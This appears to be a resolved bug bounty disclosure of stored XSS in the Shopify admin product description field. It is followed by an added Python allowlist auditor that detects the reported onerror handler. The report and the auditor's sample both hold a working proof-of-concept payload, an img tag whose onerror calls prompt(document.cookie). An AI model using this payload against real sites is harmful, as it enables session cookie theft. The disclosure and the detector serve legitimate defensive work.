XSS triggered in "myshopify.com/admin/product"
High
Vulnerability Details
I tried to make a product description and add the XSS script in the paragraph.
## Steps for reproduction
1. Create a new product.
2. Enter XSS in the product description paragraph, such as:
```html
<div align="center" data-mce-fragment="1"> <img src=x onerror=prompt(document.cookie)>
<h4 dir="ltr" data-mce-fragment="1"> <span style="text-decoration: underline; color: #ff2a00;"> <em> <strong> (name_product) </strong></em></span> </h4>
</div>
```
## Impact
XSS can be triggered.
Report Stats
- Report ID: 978125
- State: Closed
- Substate: resolved
- Upvotes: 22
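
A defender-side check for the case in this report, as an added example that is not part of the report or Shopify's code: it audits stored description HTML against an allowlist and flags inline event handlers such as the `onerror` attribute above. The allowlists, `DescriptionAuditor` and `audit_description` are assumptions made for illustration.

```python
from html.parser import HTMLParser

# Assumed allowlist for a rich-text description field (not Shopify's actual policy).
ALLOWED_TAGS = {"div", "p", "h4", "span", "em", "strong", "img", "a"}
ALLOWED_ATTRS = {"align", "dir", "style", "src", "alt", "href"}
URL_ATTRS = {"src", "href"}
BAD_SCHEMES = ("javascript:", "vbscript:", "data:")

# Markup from the report above, whitespace normalised.
REPORT_SAMPLE = (
    '<div align="center" data-mce-fragment="1">'
    '<img src=x onerror=prompt(document.cookie)>'
    '<h4 dir="ltr" data-mce-fragment="1">'
    '<span style="text-decoration: underline; color: #ff2a00;">'
    '<em><strong>(name_product)</strong></em></span></h4></div>'
)
# Constructed benign description using the same formatting tags.
CLEAN_SAMPLE = '<div align="center"><h4 dir="ltr"><em>Blue mug</em></h4></div>'


class DescriptionAuditor(HTMLParser):
    """Records markup a stored description should not contain."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.findings.append(("tag", tag, None))
        for name, value in attrs:
            if name.startswith("on"):  # onerror, onload, ...
                self.findings.append(("event-handler", tag, name))
            elif name.startswith("data-"):
                continue  # inert editor attributes such as data-mce-fragment
            elif name not in ALLOWED_ATTRS:
                self.findings.append(("attribute", tag, name))
            elif name in URL_ATTRS and (value or "").strip().lower().startswith(BAD_SCHEMES):
                self.findings.append(("url-scheme", tag, name))


def audit_description(html):
    """Return a list of (kind, tag, attribute) findings for one description."""
    auditor = DescriptionAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


if __name__ == "__main__":
    print(audit_description(REPORT_SAMPLE))  # [('event-handler', 'img', 'onerror')]
    print(audit_description(CLEAN_SAMPLE))   # []
```

The auditor only reports findings; in this sketch `style` values pass through unchecked.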